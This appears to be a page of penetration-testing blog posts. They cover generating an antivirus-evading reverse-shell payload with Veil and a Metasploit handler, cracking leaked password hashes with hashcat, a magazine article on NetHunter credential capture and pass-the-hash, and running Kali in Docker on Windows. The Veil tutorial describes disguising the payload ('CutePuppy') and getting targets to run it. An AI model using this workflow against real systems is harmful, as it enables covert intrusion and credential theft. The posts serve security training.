Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements

Cracking Passwords up to 256 Characters with Hashcat

Think your 12 character passwords are still strong enough? One of the top password cracking programs can now crack password up to 256 characters!

The 4.x release of Hashcat blows through the previous 32 character password cracking limit and can now crack up to 256 character passwords. It has been very helpful for working through Troy Hunt’s half a billion password hash release.

If you use the default or -w1 speed switch in Hashcat, it will now crack passwords up to 256 characters:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -w1 –gpu-temp-retain 75

hashcat long passwords1

If you use the -O switch, Hashcat will crack at a much faster rate, but will only be able to crack the traditional 32 and under length hashes:

hashcat long passwords2

As seen in the command below:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -O –gpu-temp-retain 75

Here are some of the large passwords (most likely unintentional junk) found in Troy Hunt’s 500 Million “Have I been Pwned” SHA1 password hash release:

24пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ

ðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅ

&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:

12345РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…

greens and water shine a place where a word friends speak to a thicket:

mihunol:||smtp.zdcd.pn||25||dfslgosa@wa!t.mccdonald@dtfafod307@xzwt.rg:toothyfe:||smtp.zdct.jrg||25||fhwjw307@fgrw.rd||dalecandrobotis@cab.rt:stanmattefel

* The last one could have possibly contained actual account information so the website name and possible account information has been altered, but the style, layout and length have remained the same.

All of the passwords above except for one were recovered from using wordlists and rules together, so similar passwords were already in the wordlist. One was recovered by just daisy chaining together multiple repetitive binary strings.

There are some other odd returns found in the cracked hashes, ones that looked something similar to these:

  • $HEX[ab32d4c1334455]d]9]
  • $HEX[abcbdb1212121212]4]f6d]

I have never seen Hashcat do that before, but when they were decoded from Hex to Ascii they looked about right.

There are also a lot of jumbled together lines that include partial e-mails & passwords together. Some even include what appear to be phone numbers and outdated credit cards (any personal information has already been publicly dumped, some of it for years). Obviously, these weren’t used as passwords, but is just some of the malformed data mentioned on Troy’s blog. Some of these lines are extremely long, so it is impressive that Hashcat is able to recover them.

I am still working through the list, I’m just using a single GTX960 card so it is taking a while, but during the process I found Not so Secure’s “OneRuletoRuleThemAll” Hashcat rule extremely useful.

Thanks to Troy Hunt for releasing the 500 million password dump. As a security trainer, it is a lot of fun and great practice to run through the dump using Hashcat. Also, thanks for his work on the “Have I Been Pwned” website. If you want to see if any of your accounts are included in the dump, just visit the Have I Been Pwned Website.

If you need to crack very long complex passwords, give Hashcat a try!

NetHunter Article Featured in Hakin9 Magazine

The latest Hakin9 Magazine is out! This issue is all about Android security and features my article on using Kali NetHunter and Responder together for getting quick user credentials.

Front Cover

In my article I explain how you could recover network credentials from a Windows network using the Android based Kali NetHunter and Responder (an LLMNR, NBT-NS & MDNS poisoner). I also show how you can “pass the hash” with credentials obtained and gain remote shell access to an unsecured or improperly secured Windows Server.

Other Articles in this Issue Include:

Mobile Penetration Testing Tutorial

by Olivia Orr

The objective of this tutorial is to learn the most common vulnerabilities in mobile applications using an app intentionally designed to be insecure. This tutorial will be based on the Windows platform, but you can use other systems if you wish.


Quick Android Review Kit (QARK) – A comrade for Android security analysis

by Vinayak Joshi and Venkatesh Sivakumar (Pranav Venkat)

QARK stands for Quick Android Review Kit. A quirky companion to get the hidden potential vulnerabilities of any Android applications. It is an open community tool designed to assist mobile application security pentesters to leverage its capabilities to reverse engineer mobile applications and conduct static analysis on the hidden vulnerabilities that can potentially create critical breaches. This article will explain how to use it.


Peeping Inside Android Applications: Reverse Engineering with Androguard

by Ajit Kumar

Reverse engineering is one of the ways to find out what’s inside of any Android applications; it also helps developers to learn, test and debug their and applications as well as applications written by others. Reverse engineering is a complex and cumbersome task, so tools like Androguard make this task automated and hence ease the job of reverse engineers. This tutorial provides a brief introduction of Androguard, explains various tools available inside Androguard and provides some examples of basic reverse engineering with Androguard.

And much more, check it out!

Running Kali Linux in a Windows 10 Command Prompt

Ever wanted to run Kali Linux in Windows 10? Well, you can using Docker! Docker is a great way to run programs or even entire operating systems on different platforms. Using Docker you can even run Kali Linux on Windows 10!

But just because you can do something doesn’t mean that you should. Yes, it is cool to see Kali in a command prompt, but personally I think there are much easier ways to run Kali on a Windows platform.

With Docker, usually you just pull down your app and it works. In Windows, you need to enable Containers, then install Docker, then enable Hyper-V (which will disable your VMWare or VirtualBox VMs by the way) and then finally download Kali for Docker. Oh, and don’t forget to reboot, multiple times. When done you will have a minimal install of Kali, enjoy!

If you are new to Kali and want to run Kali in Windows 10, use VMWare or Virtualbox, and just download the VM version of Kali. You will be much happier with your life.

Okay, fine, I can see that you are determined to see this through, so let’s continue. Official instructions for installing the Kali Docker image can be found on the Kali website:

https://www.kali.org/news/official-kali-linux-docker-images/

Technet even has an article on it, which is helpful as well:

https://blogs.technet.microsoft.com/positivesecurity/2017/09/01/setting-up-kali-linux-in-docker-on-windows-10/

But you kind of need a mix of both and a few more steps to actually get it working.

Installing Docker

In Windows 10, open a command prompt

  • Search for and run “optionalfeatures” as an administrator
  • Click on “Containers” to add it:

Kali Docker Install_1

When this is done:

Kali Docker Install_2

Once Docker is installed, it will tell you that it needs to close your active user and log back in. Don’t believe it, you actually need to reboot your system.

After Reboot:

  • From the main menu, run “Docker for Windows” as administrator
  • At the Hyper-V Feature not enabled, choose enable, note this breaks Virtualbox
  • Reboot again…

From the main menu start “Docker for Windows” again

  • Wait until it is ready, this can take a few minutes
  • Now open a system level command prompt

Installing Kali

At the command prompt:

  • Enter, “docker pull kalilinux/kali-linux-docker

Kali Docker Install_3

This will download the Kali Linux Docker image.

  • When finished enter, “docker run -t -i kalilinux/kali-linux-docker /bin/bash

You will then be greeted with a Kali root prompt. You now have a minimal install of Kali Linux! Several programs do work at this point, like nmap and some of the other basic Kali tools. Metasploit is not installed by default and you need to install it if you need it.

Update the system:

  • apt-get update
  • apt-get upgrade

This will take a while. When done, install Metasploit:

  • apt install metasploit-framework ruby

When it is finished, you need to start and initialize the database:

  • service postgresql start
  • msfdb init
  • And lastly, “msfconsole

And Metasploit starts:

Kali Docker Install_4

At this point you can install any of the Kali tool metapackages if you wish, or just play around with it as is. Just a note, ifconfig isn’t installed by default. You need to use the newer “ip address” or “ip a” commands, or you can just install “net-tools”.

Uninstalling it

Done already? I had it on my Windows 10 system about as long as it took to install it. Don’t get me wrong, this is really cool. But like I mentioned earlier, this is much easier to do in Windows using VMWare, or VirtualBox and the corresponding Kali VM. Though some might prefer using the Windows Subsystem for Linux and not have the Virtual machine overhead.

Here is how you uninstall it:

  • In Optional Features, uncheck “Containers”
  • Uninstall Docker
  • Don’t forget to also remove Hyper-V or your other virtual machine software will not work.

Kali for Docker is a great idea, I do really like it, but my personal preference is just not for the Windows platform. But don’t take my word for it, you might like it, if interested try it and see what you think.